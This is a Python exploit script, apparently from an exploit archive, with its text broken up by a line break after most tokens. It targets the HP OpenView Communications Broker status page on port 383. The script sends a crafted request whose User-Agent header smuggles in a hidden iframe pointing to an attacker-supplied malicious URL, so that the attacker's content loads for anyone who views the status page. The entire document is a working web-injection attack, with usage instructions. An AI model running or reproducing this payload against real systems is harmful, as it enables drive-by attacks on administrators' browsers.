import
argparse, socket, sys
if
(
len
(sys.argv) <
2
)
or
(sys.argv[
1
]
=
=
'-h'
)
or
(sys.argv[
1
]
=
=
'--help'
):
print
'\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n'
print
' <TargetIP>: The Target IP Address'
print
' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n'
print
'Options:'
print
' [--port]: The port the HP Communications Broker is running on, default is 383'
sys.exit(
1
)
parser
=
argparse.ArgumentParser()
parser.add_argument(
"TargetIP"
)
parser.add_argument(
"iFrameURL"
)
parser.add_argument(
"--port"
,
type
=
int
, default
=
383
)
args
=
parser.parse_args()
agent
=
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
host
=
args.TargetIP
port
=
args.port
iFrameURL
=
args.iFrameURL
def
main():
payload
=
"GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"
+
iFrameURL
+
"'></iframe><a>"
+
agent
+
"</a>\r\n\r\n"
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print
"[*] Checking host: "
+
host
+
"\n"
try
:
s.connect((host,
int
(port)))
except
Exception as e:
print
"[+] Error Connecting: "
, e
exit()
print
"[*] Sending payload to HP OpenView HTTP Communication host "
+
host
+
"\n"
while
payload !
=
'q'
:
s.send(payload.encode())
data
=
s.recv(
1024
)
print
"[*] Payload Sent."
payload
=
raw_input
(
"\n[+] Keeping Connection Open ([q]uit):"
)
return
if
__name__
=
=
'__main__'
:
main()